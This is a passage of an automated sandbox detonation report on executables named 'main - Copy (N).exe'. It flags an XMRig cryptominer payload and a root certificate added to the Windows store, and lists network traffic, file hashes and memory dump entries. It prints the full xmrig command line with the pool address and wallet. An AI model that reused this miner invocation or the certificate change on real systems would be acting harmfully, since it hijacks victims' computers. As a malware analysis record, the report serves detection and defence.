memory/4580-35-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-36-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-37-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-38-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-39-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-40-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-41-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-42-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-43-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-44-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-45-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-46-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-47-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-48-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-49-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-50-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-51-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-52-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-53-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-54-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-55-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-56-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-57-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-58-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-59-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-60-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-61-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-62-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-63-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-64-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-65-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-66-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-67-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-68-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-69-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-70-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-71-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-72-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-73-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-74-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-75-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-76-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-77-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-78-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-79-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-80-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-81-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

memory/4580-82-0x00007FF6159A0000-0x00007FF6164A3000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:40

Platform

win10v2004-20240611-en

Max time kernel

1793s

Max time network

1784s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
BE 2.17.107.203:80 tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 11.179.89.13.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3580-14-0x000001A018210000-0x000001A018230000-memory.dmp

memory/3580-15-0x000001A019C20000-0x000001A019C40000-memory.dmp

memory/3580-16-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-17-0x000001A019C40000-0x000001A019C60000-memory.dmp

memory/3580-18-0x000001A019C60000-0x000001A019C80000-memory.dmp

memory/3580-19-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-20-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-23-0x000001A019C60000-0x000001A019C80000-memory.dmp

memory/3580-22-0x000001A019C40000-0x000001A019C60000-memory.dmp

memory/3580-21-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-24-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-25-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-26-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-27-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-28-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-29-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-30-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-31-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-32-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-33-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-34-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-35-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-36-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-37-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-38-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-39-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-40-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-41-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-42-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-43-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-44-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-45-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-46-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-47-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-48-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-49-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-50-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-51-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-52-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-53-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-54-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-55-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-56-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-57-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-58-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-59-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-60-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-61-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-62-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-63-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-64-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-65-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-66-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-67-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-68-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-69-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-70-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-71-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-72-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-73-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-74-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-75-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-76-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-77-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-78-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-79-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-80-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-81-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

memory/3580-82-0x00007FF613F90000-0x00007FF614A93000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-14 05:12

Reported

2024-06-14 06:34

Platform

win10v2004-20240611-en

Max time kernel

1794s

Max time network

1799s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
